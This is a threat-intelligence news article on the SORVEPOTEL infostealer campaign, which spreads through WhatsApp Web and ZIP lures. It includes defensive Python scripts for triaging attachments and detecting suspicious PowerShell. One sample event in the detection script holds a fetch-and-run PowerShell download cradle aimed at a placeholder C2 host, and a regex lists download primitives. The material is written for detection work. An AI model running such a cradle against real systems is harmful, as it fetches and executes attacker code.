SORVEPOTEL Malware Hijacks WhatsApp Web to Self-Propagate, Targets Brazilian Users
Trend Micro uncovers Water Saci campaign spreading SORVEPOTEL infostealer via WhatsApp, hijacking active sessions to propagate and steal financial credentials.

Trend Micro researchers have identified an active malware campaign dubbed Water Saci that spreads the SORVEPOTEL infostealer via WhatsApp. The malware uses malicious ZIP file attachments disguised as receipts or budgets, tricking users into opening them on a desktop. Once executed, it hijacks active WhatsApp Web sessions to automatically send copies of itself to all contacts and groups, enabling rapid propagation.
The attack chain begins with a phishing message containing a ZIP archive, often named "RES-20250930_112057.zip" or "ORCAMENTO_114418.zip." The message, written in Portuguese, urges recipients to download and open the file on a PC. Inside the ZIP is a Windows shortcut (.LNK) file that, when clicked, launches a PowerShell script to download the main payload from attacker-controlled domains. The payload is a .NET DLL that injects shellcode into powershell_ise.exe for persistence and data theft.
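The attachment stage described above gives a defender a concrete artifact to check at the mail or chat gateway: a ZIP whose name follows the lure pattern and whose contents include a Windows shortcut. The following Python triage script is an added example, not code from the article or from Trend Micro; the lure-name regexes are constructed from the filenames quoted here, the shortcut member name inside the sample archive is invented for the demo, and the only external fact it relies on is the standard Shell Link header (HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046), which lets it catch a shortcut even when its extension has been changed.

```python
import io
import re
import zipfile

# Lure filename shapes quoted in the article, turned into constructed regexes:
# RES-20250930_112057.zip, ORCAMENTO_114418.zip, COMPROVANTE_20251001_094031.zip
LURE_NAME_PATTERNS = [
    re.compile(r"^RES-\d{8}_\d{6}\.zip$", re.IGNORECASE),
    re.compile(r"^ORCAMENTO_\d+\.zip$", re.IGNORECASE),
    re.compile(r"^COMPROVANTE_\d{8}_\d{6}\.zip$", re.IGNORECASE),
]

# Windows Shell Link header: HeaderSize 0x4C, then LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian GUID byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "0000" "0000" "c000000000000046")


def matches_lure_name(filename: str) -> bool:
    """True if the archive name follows one of the quoted lure patterns."""
    return any(p.match(filename) for p in LURE_NAME_PATTERNS)


def triage_zip(filename: str, data: bytes) -> dict:
    """Inspect an attachment in memory and report shortcut members.

    lnk_members:   members with a .lnk extension
    disguised_lnk: members whose bytes start with the LNK header but carry
                   another extension (renamed shortcut)
    block:         True when any shortcut was found
    """
    findings = {
        "lure_name": matches_lure_name(filename),
        "lnk_members": [],
        "disguised_lnk": [],
    }
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                with zf.open(info) as member:
                    head = member.read(len(LNK_MAGIC))
                if info.filename.lower().endswith(".lnk"):
                    findings["lnk_members"].append(info.filename)
                elif head == LNK_MAGIC:
                    findings["disguised_lnk"].append(info.filename)
    except zipfile.BadZipFile:
        findings["error"] = "not a valid zip"
    findings["block"] = bool(findings["lnk_members"] or findings["disguised_lnk"])
    return findings


def build_sample_zip(members: dict) -> bytes:
    """Build a small in-memory ZIP from {name: bytes}; used only for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed stand-in for a shortcut body: valid header, zero-filled remainder.
FAKE_LNK = LNK_MAGIC + b"\x00" * 60

if __name__ == "__main__":
    # Member name is invented; the article does not give the shortcut's name.
    sample = build_sample_zip({"RES-20250930_112057.lnk": FAKE_LNK})
    print(triage_zip("RES-20250930_112057.zip", sample))
```

Checking the header bytes rather than only the extension matters because the extension is attacker-controlled; the `block` flag is what a gateway policy would act on, while `lure_name` alone is only a weak signal and is reported separately.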
SORVEPOTEL is primarily an infostealer targeting financial institutions and cryptocurrency exchanges in Brazil. According to Trend Micro telemetry, 457 of 477 detected infections are concentrated in Brazil, with government and public service organizations hit hardest. The malware also impacts manufacturing, technology, education, and construction sectors. The campaign's focus on desktop execution suggests attackers are targeting enterprises rather than consumers.
The malware maintains contact with multiple command-and-control (C&C) servers and uses PowerShell to download and execute additional payloads in memory. It monitors banking-related activity and can steal credentials for various financial platforms. The self-propagation mechanism via WhatsApp Web causes infected accounts to be banned due to excessive spam activity, but not before the malware spreads widely.
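Two host-side behaviours in the chain described here and in the attack-chain paragraph stand out for endpoint detection: a PowerShell download cradle launched from a shortcut (so its parent is the shell) and outbound network traffic from powershell_ise.exe, which normally has no reason to contact remote hosts. The script below is an added example, not Trend Micro's detection logic; the event records are constructed in a Sysmon-like shape with field names chosen for this demo, the C2 hostname is an obvious placeholder, and the assumption that a shortcut opened from Explorer yields explorer.exe as the parent process is stated in the comments.

```python
import re

# Constructed process-creation and network events in a Sysmon-like shape.
# Field names are this example's own; the C2 host is a placeholder.
SAMPLE_EVENTS = [
    {
        "type": "process",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://EXAMPLE-C2.invalid/p')",
    },
    {
        "type": "network",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
        "dest": "EXAMPLE-C2.invalid",
        "port": 443,
    },
    {
        "type": "process",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": "notepad.exe notes.txt",
    },
    {
        "type": "network",
        "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "dest": "example.org",
        "port": 443,
    },
]

# Common PowerShell download-and-execute primitives seen in command lines.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased final path component of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (rule_name, detail) tuples for events matching either rule."""
    alerts = []
    for ev in events:
        # Rule 1: PowerShell spawned by the shell (assumed parent when a user
        # double-clicks a .LNK) with a download cradle on its command line.
        if (
            ev["type"] == "process"
            and basename(ev["image"]) == "powershell.exe"
            and basename(ev["parent"]) == "explorer.exe"
            and DOWNLOAD_CRADLE.search(ev["cmdline"])
        ):
            alerts.append(("shortcut_launched_download_cradle", ev["cmdline"]))
        # Rule 2: powershell_ise.exe initiating a network connection, which is
        # consistent with shellcode injected into that host process.
        if ev["type"] == "network" and basename(ev["image"]) == "powershell_ise.exe":
            alerts.append(("powershell_ise_outbound", f"{ev['dest']}:{ev['port']}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Rule 1 is deliberately narrow (parent, image and a cradle keyword all required) so that ordinary administrative PowerShell does not fire it; Rule 2 needs no keyword at all because the process itself is the anomaly, which also makes it resilient to cradle obfuscation.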
Trend Micro notes that email is also used as an initial infection vector, with phishing emails distributing ZIP attachments named like "COMPROVANTE_20251001_094031.zip." These emails appear legitimate and use subjects such as "Documento de Rafael B" to entice recipients. The campaign highlights the abuse of trusted communication channels to bypass traditional security measures.
As a mitigation, Trend Micro recommends evaluating whether users need WhatsApp access and implementing clear BYOD policies. The campaign serves as a blueprint for similar attacks globally, emphasizing the need for modern defensive tactics and proactive monitoring of communication channels. Users should avoid opening suspicious attachments and verify messages from contacts before downloading files.